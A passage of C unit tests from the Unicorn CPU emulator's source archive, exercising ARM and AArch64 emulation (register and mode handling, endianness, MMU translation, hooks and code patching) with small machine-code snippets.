r_sp = 0x0010000; OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); r_lr = 0x0001234; OK(uc_reg_write(uc, UC_ARM_REG_LR, &r_lr)); uc_assert_err( UC_ERR_EXCEPTION, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_SP, &r_sp)); OK(uc_reg_read(uc, UC_ARM_REG_LR, &r_lr)); OK(uc_reg_read(uc, UC_ARM_REG_CPSR, &r_cpsr)); TEST_CHECK((r_cpsr & ((1 << 4) - 1)) == 0); // Stay in USR32 TEST_CHECK(r_lr == 0x1234); TEST_CHECK(r_sp == 0x10000); OK(uc_close(uc)); } static void test_arm_mrc(void) { uc_engine *uc; // mrc p15, #0, r1, c13, c0, #3 char code[] = "\x1d\xee\x70\x1f"; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB, code, sizeof(code) - 1, UC_CPU_ARM_MAX); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } static void test_arm_hflags_rebuilt(void) { // MRS r6, apsr // BIC r6, r6, #&1F // ORR r6, r6, #&10 // MSR cpsr_c, r6 // SWI OS_EnterOS // MSR cpsr_c, r6 char code[] = "\x00\x60\x0f\xe1\x1f\x60\xc6\xe3\x10\x60\x86\xe3\x06\xf0\x21" "\xe1\x16\x00\x02\xef\x06\xf0\x21\xe1"; uc_engine *uc; uint32_t r_cpsr, r_spsr, r_r13, r_r14, r_pc; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A9); r_cpsr = 0x40000013; // SVC32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_spsr = 0x40000013; OK(uc_reg_write(uc, UC_ARM_REG_SPSR, &r_spsr)); r_r13 = 0x12345678; // SP OK(uc_reg_write(uc, UC_ARM_REG_R13, &r_r13)); r_r14 = 0x00102220; // LR OK(uc_reg_write(uc, UC_ARM_REG_R14, &r_r14)); r_cpsr = 0x40000010; // USR32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_r13 = 0x0010000; // SP OK(uc_reg_write(uc, UC_ARM_REG_R13, &r_r13)); r_r14 = 0x0001234; // LR OK(uc_reg_write(uc, UC_ARM_REG_R14, &r_r14)); uc_assert_err( UC_ERR_EXCEPTION, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); r_cpsr = 0x60000013; OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_cpsr = 0x60000010; OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_cpsr = 0x60000013; OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); OK(uc_reg_read(uc, UC_ARM_REG_PC, &r_pc)); OK(uc_emu_start(uc, r_pc, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_CPSR, &r_cpsr)); OK(uc_reg_read(uc, UC_ARM_REG_R13, &r_r13)); OK(uc_reg_read(uc, UC_ARM_REG_R14, &r_r14)); TEST_CHECK(r_cpsr == 0x60000010); TEST_CHECK(r_r13 == 0x00010000); TEST_CHECK(r_r14 == 0x00001234); OK(uc_close(uc)); } static bool test_arm_mem_access_abort_hook_mem(uc_engine *uc, uc_mem_type type, uint64_t addr, int size, int64_t val, void *data) { OK(uc_reg_read(uc, UC_ARM_REG_PC, data)); return false; } static bool test_arm_mem_access_abort_hook_insn_invalid(uc_engine *uc, void *data) { OK(uc_reg_read(uc, UC_ARM_REG_PC, data)); return false; } static void test_arm_mem_access_abort(void) { // LDR r0, [r0] // Undefined instruction char code[] = "\x00\x00\x90\xe5\x00\xa0\xf0\xf7"; uc_engine *uc; uint32_t r_pc, r_r0, r_pc_in_hook; uc_hook hk, hkk; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A9); r_r0 = 0x990000; OK(uc_reg_write(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_hook_add(uc, &hk, UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED | UC_HOOK_MEM_FETCH_UNMAPPED, test_arm_mem_access_abort_hook_mem, (void *)&r_pc_in_hook, 1, 0)); OK(uc_hook_add(uc, &hkk, UC_HOOK_INSN_INVALID, test_arm_mem_access_abort_hook_insn_invalid, (void *)&r_pc_in_hook, 1, 0)); uc_assert_err(UC_ERR_READ_UNMAPPED, uc_emu_start(uc, code_start, code_start + 4, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_PC, &r_pc)); TEST_CHECK(r_pc == r_pc_in_hook); uc_assert_err(UC_ERR_INSN_INVALID, uc_emu_start(uc, code_start + 4, code_start + 8, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_PC, &r_pc)); TEST_CHECK(r_pc == r_pc_in_hook); uc_assert_err(UC_ERR_FETCH_UNMAPPED, uc_emu_start(uc, 0x900000, 0x900000 + 8, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_PC, &r_pc)); TEST_CHECK(r_pc == r_pc_in_hook); OK(uc_close(uc)); } static void test_arm_read_sctlr(void) { uc_engine *uc; uc_arm_cp_reg reg; OK(uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc)); // SCTLR. See arm reference. reg.cp = 15; reg.is64 = 0; reg.sec = 0; reg.crn = 1; reg.crm = 0; reg.opc1 = 0; reg.opc2 = 0; OK(uc_reg_read(uc, UC_ARM_REG_CP_REG, ®)); TEST_CHECK((uint32_t)((reg.val >> 31) & 1) == 0); OK(uc_close(uc)); } static void test_arm_be_cpsr_sctlr(void) { uc_engine *uc; uc_arm_cp_reg reg; uint32_t cpsr; OK(uc_open(UC_ARCH_ARM, UC_MODE_BIG_ENDIAN, &uc)); OK(uc_ctl_set_cpu_model( uc, UC_CPU_ARM_1176)); // big endian code, big endian data // SCTLR. See arm reference. reg.cp = 15; reg.is64 = 0; reg.sec = 0; reg.crn = 1; reg.crm = 0; reg.opc1 = 0; reg.opc2 = 0; OK(uc_reg_read(uc, UC_ARM_REG_CP_REG, ®)); OK(uc_reg_read(uc, UC_ARM_REG_CPSR, &cpsr)); TEST_CHECK((reg.val & (1 << 7)) != 0); TEST_CHECK((cpsr & (1 << 9)) != 0); OK(uc_close(uc)); OK(uc_open(UC_ARCH_ARM, UC_MODE_ARMBE8, &uc)); OK(uc_ctl_set_cpu_model(uc, UC_CPU_ARM_CORTEX_A15)); // SCTLR. See arm reference. reg.cp = 15; reg.is64 = 0; reg.sec = 0; reg.crn = 1; reg.crm = 0; reg.opc1 = 0; reg.opc2 = 0; OK(uc_reg_read(uc, UC_ARM_REG_CP_REG, ®)); OK(uc_reg_read(uc, UC_ARM_REG_CPSR, &cpsr)); // SCTLR.B == 0 TEST_CHECK((reg.val & (1 << 7)) == 0); TEST_CHECK((cpsr & (1 << 9)) != 0); OK(uc_close(uc)); } static void test_arm_switch_endian(void) { uc_engine *uc; char code[] = "\x00\x00\x91\xe5"; // ldr r0, [r1] uint32_t r_r1 = (uint32_t)code_start; uint32_t r_r0, r_cpsr; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A15); OK(uc_reg_write(uc, UC_ARM_REG_R1, &r_r1)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R0, &r_r0)); // Little endian TEST_CHECK(r_r0 == 0xe5910000); OK(uc_reg_read(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_cpsr |= (1 << 9); OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R0, &r_r0)); // Big endian TEST_CHECK(r_r0 == 0x000091e5); OK(uc_close(uc)); } static void test_armeb_ldrb(void) { uc_engine *uc; const char test_code[] = "\xe5\xd2\x10\x00"; // ldrb r1, [r2] uint64_t data_address = 0x800000; int r1 = 0x1234; int r2 = data_address; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_ARM | UC_MODE_BIG_ENDIAN, test_code, sizeof(test_code) - 1, UC_CPU_ARM_1176); OK(uc_mem_map(uc, data_address, 1024 * 1024, UC_PROT_ALL)); OK(uc_mem_write(uc, data_address, "\x66\x67\x68\x69", 4)); OK(uc_reg_write(uc, UC_ARM_REG_R2, &r2)); OK(uc_emu_start(uc, code_start, code_start + sizeof(test_code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R1, &r1)); TEST_CHECK(r1 == 0x66); OK(uc_close(uc)); } static void test_arm_context_save(void) { uc_engine *uc; uc_engine *uc2; char code[] = "\x83\xb0"; // sub sp, #0xc uc_context *ctx; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_R5); OK(uc_context_alloc(uc, &ctx)); OK(uc_context_save(uc, ctx)); OK(uc_context_restore(uc, ctx)); uc_common_setup(&uc2, UC_ARCH_ARM, UC_MODE_THUMB, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A7); // Note the different CPU model OK(uc_context_restore(uc2, ctx)); OK(uc_context_free(ctx)); OK(uc_close(uc)); OK(uc_close(uc2)); } static void test_arm_thumb2(void) { uc_engine *uc; // MOVS R0, #0x24 // AND.W R0, R0, #4 char code[] = "\x24\x20\x00\xF0\x04\x00"; uint32_t r_r0; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_LITTLE_ENDIAN, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_R5); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R0, &r_r0)); TEST_CHECK(r_r0 == 0x4); OK(uc_close(uc)); } static void test_armeb_be32_thumb2(void) { uc_engine *uc; // MOVS R0, #0x24 // AND.W R0, R0, #4 char code[] = "\x20\x24\xF0\x00\x00\x04"; uint32_t r_r0; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_R5); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R0, &r_r0)); TEST_CHECK(r_r0 == 0x4); OK(uc_close(uc)); } TEST_LIST = {{"test_arm_nop", test_arm_nop}, {"test_arm_thumb_sub", test_arm_thumb_sub}, {"test_armeb_sub", test_armeb_sub}, {"test_armeb_be8_sub", test_armeb_be8_sub}, {"test_arm_thumbeb_sub", test_arm_thumbeb_sub}, {"test_arm_thumb_ite", test_arm_thumb_ite}, {"test_arm_m_thumb_mrs", test_arm_m_thumb_mrs}, {"test_arm_m_control", test_arm_m_control}, {"test_arm_m_exc_return", test_arm_m_exc_return}, {"test_arm_und32_to_svc32", test_arm_und32_to_svc32}, {"test_arm_usr32_to_svc32", test_arm_usr32_to_svc32}, {"test_arm_v8", test_arm_v8}, {"test_arm_thumb_smlabb", test_arm_thumb_smlabb}, {"test_arm_not_allow_privilege_escalation", test_arm_not_allow_privilege_escalation}, {"test_arm_mrc", test_arm_mrc}, {"test_arm_hflags_rebuilt", test_arm_hflags_rebuilt}, {"test_arm_mem_access_abort", test_arm_mem_access_abort}, {"test_arm_read_sctlr", test_arm_read_sctlr}, {"test_arm_be_cpsr_sctlr", test_arm_be_cpsr_sctlr}, {"test_arm_switch_endian", test_arm_switch_endian}, {"test_armeb_ldrb", test_armeb_ldrb}, {"test_arm_context_save", test_arm_context_save}, {"test_arm_thumb2", test_arm_thumb2}, {"test_armeb_be32_thumb2", test_armeb_be32_thumb2}, {NULL, NULL}};�������������������������������������������������������������unicorn-2.1.1/tests/unit/test_arm64.c���������������������������������������������������������������0000664�0000000�0000000�00000037751�14675241067�0017476�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "acutest.h" #include "unicorn/unicorn.h" #include "unicorn_test.h" #include <stdbool.h> #include <stdint.h> #include <stdio.h> const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size, uc_cpu_arm64 cpu) { OK(uc_open(arch, mode, uc)); OK(uc_ctl_set_cpu_model(*uc, cpu)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } static void test_arm64_until(void) { uc_engine *uc; char code[] = "\x30\x00\x80\xd2\x11\x04\x80\xd2\x9c\x23\x00\x91"; /* mov x16, #1 mov x17, #0x20 add x28, x28, 8 */ uint64_t r_x16 = 0x12341234; uint64_t r_x17 = 0x78907890; uint64_t r_pc = 0x00000000; uint64_t r_x28 = 0x12341234; uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_A72); // initialize machine registers OK(uc_reg_write(uc, UC_ARM64_REG_X16, &r_x16)); OK(uc_reg_write(uc, UC_ARM64_REG_X17, &r_x17)); OK(uc_reg_write(uc, UC_ARM64_REG_X28, &r_x28)); // emulate the three instructions OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 3)); OK(uc_reg_read(uc, UC_ARM64_REG_X16, &r_x16)); OK(uc_reg_read(uc, UC_ARM64_REG_X17, &r_x17)); OK(uc_reg_read(uc, UC_ARM64_REG_X28, &r_x28)); OK(uc_reg_read(uc, UC_ARM64_REG_PC, &r_pc)); TEST_CHECK(r_x16 == 0x1); TEST_CHECK(r_x17 == 0x20); TEST_CHECK(r_x28 == 0x1234123c); TEST_CHECK(r_pc == (code_start + sizeof(code) - 1)); OK(uc_close(uc)); } static void test_arm64_code_patching(void) { uc_engine *uc; char code[] = "\x00\x04\x00\x11"; // add w0, w0, 0x1 uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_A72); // zero out x0 uint64_t r_x0 = 0x0; OK(uc_reg_write(uc, UC_ARM64_REG_X0, &r_x0)); // emulate the instruction OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); // check value OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); TEST_CHECK(r_x0 == 0x1); // patch instruction char patch_code[] = "\x00\xfc\x1f\x11"; // add w0, w0, 0x7FF OK(uc_mem_write(uc, code_start, patch_code, sizeof(patch_code) - 1)); // zero out x0 r_x0 = 0x0; OK(uc_reg_write(uc, UC_ARM64_REG_X0, &r_x0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(patch_code) - 1, 0, 0)); // check value OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); TEST_CHECK(r_x0 != 0x1); TEST_CHECK(r_x0 == 0x7ff); OK(uc_close(uc)); } // Need to flush the cache before running the emulation after patching static void test_arm64_code_patching_count(void) { uc_engine *uc; char code[] = "\x00\x04\x00\x11"; // add w0, w0, 0x1 uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_A72); // zero out x0 uint64_t r_x0 = 0x0; OK(uc_reg_write(uc, UC_ARM64_REG_X0, &r_x0)); // emulate the instruction OK(uc_emu_start(uc, code_start, -1, 0, 1)); // check value OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); TEST_CHECK(r_x0 == 0x1); // patch instruction char patch_code[] = "\x00\xfc\x1f\x11"; // add w0, w0, 0x7FF OK(uc_mem_write(uc, code_start, patch_code, sizeof(patch_code) - 1)); OK(uc_ctl_remove_cache(uc, code_start, code_start + sizeof(patch_code) - 1)); // zero out x0 r_x0 = 0x0; OK(uc_reg_write(uc, UC_ARM64_REG_X0, &r_x0)); OK(uc_emu_start(uc, code_start, -1, 0, 1)); // check value OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); TEST_CHECK(r_x0 != 0x1); TEST_CHECK(r_x0 == 0x7ff); OK(uc_close(uc)); } static void test_arm64_v8_pac(void) { uc_engine *uc; char code[] = "\x28\xfd\xea\xc8"; // casal x10, x8, [x9] uint64_t r_x9, r_x8, mem; uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_MAX); OK(uc_mem_map(uc, 0x40000, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0x40000, "\x00\x00\x00\x00\x00\x00\x00\x00", 8)); r_x9 = 0x40000; OK(uc_reg_write(uc, UC_ARM64_REG_X9, &r_x9)); r_x8 = 0xdeadbeafdeadbeaf; OK(uc_reg_write(uc, UC_ARM64_REG_X8, &r_x8)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_mem_read(uc, 0x40000, (void *)&mem, 8)); TEST_CHECK(LEINT64(mem) == r_x8); OK(uc_close(uc)); } static void test_arm64_read_sctlr(void) { uc_engine *uc; uc_arm64_cp_reg reg; OK(uc_open(UC_ARCH_ARM64, UC_MODE_LITTLE_ENDIAN | UC_MODE_ARM, &uc)); // SCTLR_EL1. See arm reference. reg.crn = 1; reg.crm = 0; reg.op0 = 0b11; reg.op1 = 0; reg.op2 = 0; OK(uc_reg_read(uc, UC_ARM64_REG_CP_REG, ®)); TEST_CHECK((reg.val >> 58) == 0); OK(uc_close(uc)); } static uint32_t test_arm64_mrs_hook_cb(uc_engine *uc, uc_arm64_reg reg, const uc_arm64_cp_reg *cp_reg) { uint64_t r_x2 = 0x114514; OK(uc_reg_write(uc, reg, &r_x2)); // Skip return 1; } static void test_arm64_mrs_hook(void) { uc_engine *uc; uc_hook hk; uint64_t r_x2; // mrs x2, tpidrro_el0 char code[] = "\x62\xd0\x3b\xd5"; uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_LITTLE_ENDIAN | UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_A72); OK(uc_hook_add(uc, &hk, UC_HOOK_INSN, (void *)test_arm64_mrs_hook_cb, NULL, 1, 0, UC_ARM64_INS_MRS)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM64_REG_X2, &r_x2)); TEST_CHECK(r_x2 == 0x114514); OK(uc_hook_del(uc, hk)); OK(uc_close(uc)); } static bool test_arm64_correct_address_in_small_jump_hook_callback( uc_engine *uc, int type, uint64_t address, int size, int64_t value, void *user_data) { // Check registers uint64_t r_x0 = 0x0; uint64_t r_pc = 0x0; OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); OK(uc_reg_read(uc, UC_ARM64_REG_PC, &r_pc)); TEST_CHECK(r_x0 == 0x7F00); TEST_CHECK(r_pc == 0x7F00); // Check address // printf("%lx\n", address); TEST_CHECK(address == 0x7F00); return false; } static void test_arm64_correct_address_in_small_jump_hook(void) { uc_engine *uc; // mov x0, 0x7F00; // br x0 char code[] = "\x00\xe0\x8f\xd2\x00\x00\x1f\xd6"; uint64_t r_x0 = 0x0; uint64_t r_pc = 0x0; uc_hook hook; uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_A72); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_UNMAPPED, test_arm64_correct_address_in_small_jump_hook_callback, NULL, 1, 0)); uc_assert_err( UC_ERR_FETCH_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); OK(uc_reg_read(uc, UC_ARM64_REG_PC, &r_pc)); TEST_CHECK(r_x0 == 0x7F00); TEST_CHECK(r_pc == 0x7F00); OK(uc_close(uc)); } static bool test_arm64_correct_address_in_long_jump_hook_callback( uc_engine *uc, int type, uint64_t address, int size, int64_t value, void *user_data) { // Check registers uint64_t r_x0 = 0x0; uint64_t r_pc = 0x0; OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); OK(uc_reg_read(uc, UC_ARM64_REG_PC, &r_pc)); TEST_CHECK(r_x0 == 0x7FFFFFFFFFFFFF00); TEST_CHECK(r_pc == 0x7FFFFFFFFFFFFF00); // Check address // printf("%lx\n", address); TEST_CHECK(address == 0x7FFFFFFFFFFFFF00); return false; } static void test_arm64_correct_address_in_long_jump_hook(void) { uc_engine *uc; // mov x0, 0x7FFFFFFFFFFFFF00; // br x0 char code[] = "\xe0\xdb\x78\xb2\x00\x00\x1f\xd6"; uint64_t r_x0 = 0x0; uint64_t r_pc = 0x0; uc_hook hook; uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_A72); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_UNMAPPED, test_arm64_correct_address_in_long_jump_hook_callback, NULL, 1, 0)); uc_assert_err( UC_ERR_FETCH_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); OK(uc_reg_read(uc, UC_ARM64_REG_PC, &r_pc)); TEST_CHECK(r_x0 == 0x7FFFFFFFFFFFFF00); TEST_CHECK(r_pc == 0x7FFFFFFFFFFFFF00); OK(uc_close(uc)); } static void test_arm64_block_sync_pc_cb(uc_engine *uc, uint64_t addr, uint32_t size, void *data) { uint64_t val = code_start; bool first = *(bool *)data; if (first) { OK(uc_reg_write(uc, UC_ARM64_REG_PC, (void *)&val)); *(bool *)data = false; } } static void test_arm64_block_sync_pc(void) { uc_engine *uc; // add x0, x0, #1234;bl t;t:mov x1, #5678; const char code[] = "\x00\x48\x13\x91\x01\x00\x00\x94\xc1\xc5\x82\xd2"; uc_hook hk; uint64_t x0; bool data = true; uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_A72); OK(uc_hook_add(uc, &hk, UC_HOOK_BLOCK, test_arm64_block_sync_pc_cb, (void *)&data, code_start + 8, code_start + 12)); x0 = 0; OK(uc_reg_write(uc, UC_ARM64_REG_X0, (void *)&x0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM64_REG_X0, (void *)&x0)); TEST_CHECK(x0 == (1234 * 2)); OK(uc_hook_del(uc, hk)); OK(uc_close(uc)); } static bool test_arm64_block_invalid_mem_read_write_sync_cb(uc_engine *uc, int type, uint64_t address, int size, int64_t value, void *user_data) { return 0; } static void test_arm64_block_invalid_mem_read_write_sync(void) { uc_engine *uc; // mov x0, #1 // mov x1, #2 // ldr x0, [x1] const char code[] = "\x20\x00\x80\xd2\x41\x00\x80\xd2\x20\x00\x40\xf9"; uint64_t r_pc, r_x0, r_x1; uc_hook hk; uc_common_setup(&uc, UC_ARCH_ARM64, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM64_A72); OK(uc_hook_add(uc, &hk, UC_HOOK_MEM_READ, test_arm64_block_invalid_mem_read_write_sync_cb, NULL, 1, 0)); uc_assert_err( UC_ERR_READ_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM64_REG_PC, &r_pc)); OK(uc_reg_read(uc, UC_ARM64_REG_X0, &r_x0)); OK(uc_reg_read(uc, UC_ARM64_REG_X1, &r_x1)); TEST_CHECK(r_pc == code_start + 8); TEST_CHECK(r_x0 == 1); TEST_CHECK(r_x1 == 2); OK(uc_close(uc)); } static void test_arm64_mmu(void) { uc_engine *uc; char *data; char tlbe[8]; uint64_t x0, x1, x2; /* * Not exact the binary, but aarch64-linux-gnu-as generate this code and reference sometimes data after ttb0_base. * // Read data from physical address * ldr X0, =0x40000000 * ldr X1, [X0] * // Initialize translation table control registers * ldr X0, =0x180803F20 * msr TCR_EL1, X0 * ldr X0, =0xFFFFFFFF * msr MAIR_EL1, X0 * // Set translation table * adr X0, ttb0_base * msr TTBR0_EL1, X0 * // Enable caches and the MMU * mrs X0, SCTLR_EL1 * orr X0, X0, #(0x1 << 2) // The C bit (data cache). * orr X0, X0, #(0x1 << 12) // The I bit (instruction cache) * orr X0, X0, #0x1 // The M bit (MMU). * msr SCTLR_EL1, X0 * dsb SY * isb * // Read the same memory area through virtual address * ldr X0, =0x80000000 * ldr X2, [X0] * * // Stop * b . */ char code[] = "\x00\x81\x00\x58\x01\x00\x40\xf9\x00\x81\x00\x58\x40\x20\x18" "\xd5\x00\x81\x00\x58\x00\xa2\x18\xd5\x40\x7f\x00\x10\x00\x20" "\x18\xd5\x00\x10\x38\xd5\x00\x00\x7e\xb2\x00\x00\x74\xb2\x00" "\x00\x40\xb2\x00\x10\x18\xd5\x9f\x3f\x03\xd5\xdf\x3f\x03\xd5" "\xe0\x7f\x00\x58\x02\x00\x40\xf9\x00\x00\x00\x14\x1f\x20\x03" "\xd5\x1f\x20\x03\xd5\x1F\x20\x03\xD5\x1F\x20\x03\xD5"; data = malloc(0x1000); TEST_CHECK(data != NULL); OK(uc_open(UC_ARCH_ARM64, UC_MODE_ARM, &uc)); OK(uc_ctl_tlb_mode(uc, UC_TLB_CPU)); OK(uc_mem_map(uc, 0, 0x2000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0, code, sizeof(code) - 1)); // generate tlb entries tlbe[0] = 0x41; tlbe[1] = 0x07; tlbe[2] = 0; tlbe[3] = 0; tlbe[4] = 0; tlbe[5] = 0; tlbe[6] = 0; tlbe[7] = 0; OK(uc_mem_write(uc, 0x1000, tlbe, sizeof(tlbe))); tlbe[3] = 0x40; OK(uc_mem_write(uc, 0x1008, tlbe, sizeof(tlbe))); OK(uc_mem_write(uc, 0x1010, tlbe, sizeof(tlbe))); OK(uc_mem_write(uc, 0x1018, tlbe, sizeof(tlbe))); // mentioned data referenced by the asm generated my aarch64-linux-gnu-as tlbe[0] = 0; tlbe[1] = 0; OK(uc_mem_write(uc, 0x1020, tlbe, sizeof(tlbe))); tlbe[0] = 0x20; tlbe[1] = 0x3f; tlbe[2] = 0x80; tlbe[3] = 0x80; tlbe[4] = 0x1; OK(uc_mem_write(uc, 0x1028, tlbe, sizeof(tlbe))); tlbe[0] = 0xff; tlbe[1] = 0xff; tlbe[2] = 0xff; tlbe[3] = 0xff; tlbe[4] = 0x00; OK(uc_mem_write(uc, 0x1030, tlbe, sizeof(tlbe))); tlbe[0] = 0x00; tlbe[1] = 0x00; tlbe[2] = 0x00; tlbe[3] = 0x80; OK(uc_mem_write(uc, 0x1038, tlbe, sizeof(tlbe))); for (size_t i = 0; i < 0x1000; i++) { data[i] = 0x44; } OK(uc_mem_map_ptr(uc, 0x40000000, 0x1000, UC_PROT_READ, data)); OK(uc_emu_start(uc, 0, 0x44, 0, 0)); OK(uc_reg_read(uc, UC_ARM64_REG_X0, &x0)); OK(uc_reg_read(uc, UC_ARM64_REG_X1, &x1)); OK(uc_reg_read(uc, UC_ARM64_REG_X2, &x2)); TEST_CHECK(x0 == 0x80000000); TEST_CHECK(x1 == 0x4444444444444444); TEST_CHECK(x2 == 0x4444444444444444); free(data); } static void test_arm64_pc_wrap(void) { uc_engine *uc; // add x1 x2 char add_x1_x2[] = "\x20\x00\x02\x8b"; // add x1 x3 char add_x1_x3[] = "\x20\x00\x03\x8b"; uint64_t x0, x1, x2, x3; uint64_t pc = 0xFFFFFFFFFFFFFFFCULL; uint64_t page = 0xFFFFFFFFFFFFF000ULL; OK(uc_open(UC_ARCH_ARM64, UC_MODE_ARM, &uc)); OK(uc_mem_map(uc, page, 4096, UC_PROT_READ | UC_PROT_EXEC)); OK(uc_mem_write(uc, pc, add_x1_x2, sizeof(add_x1_x2) - 1)); x1 = 1; x2 = 2; OK(uc_reg_write(uc, UC_ARM64_REG_X1, &x1)); OK(uc_reg_write(uc, UC_ARM64_REG_X2, &x2)); OK(uc_emu_start(uc, pc, pc + 4, 0, 1)); OK(uc_mem_unmap(uc, page, 4096)); OK(uc_reg_read(uc, UC_ARM64_REG_X0, &x0)); TEST_CHECK((x0 == 1 + 2)); OK(uc_mem_map(uc, page, 4096, UC_PROT_READ | UC_PROT_EXEC)); OK(uc_mem_write(uc, pc, add_x1_x3, sizeof(add_x1_x3) - 1)); x1 = 5; x2 = 0; x3 = 5; OK(uc_reg_write(uc, UC_ARM64_REG_X1, &x1)); OK(uc_reg_write(uc, UC_ARM64_REG_X2, &x2)); OK(uc_reg_write(uc, UC_ARM64_REG_X3, &x3)); OK(uc_emu_start(uc, pc, pc + 4, 0, 1)); OK(uc_mem_unmap(uc, page, 4096)); OK(uc_reg_read(uc, UC_ARM64_REG_X0, &x0)); TEST_CHECK((x0 == 5 + 5)); OK(uc_close(uc)); } TEST_LIST = {{"test_arm64_until", test_arm64_until}, {"test_arm64_code_patching", test_arm64_code_patching}, {"test_arm64_code_patching_count", test_arm64_code_patching_count}, {"test_arm64_v8_pac", test_arm64_v8_pac}, {"test_arm64_read_sctlr", test_arm64_read_sctlr}, {"test_arm64_mrs_hook", test_arm64_mrs_hook}, {"test_arm64_correct_address_in_small_jump_hook", test_arm64_correct_address_in_small_jump_hook}, {"test_arm64_correct_address_in_long_jump_hook", test_arm64_correct_address_in_long_jump_hook}, {"test_arm64_block_sync_pc", test_arm64_block_sync_pc}, {"test_arm64_block_invalid_mem_read_write_sync", test_arm64_block_invalid_mem_read_write_sync}, 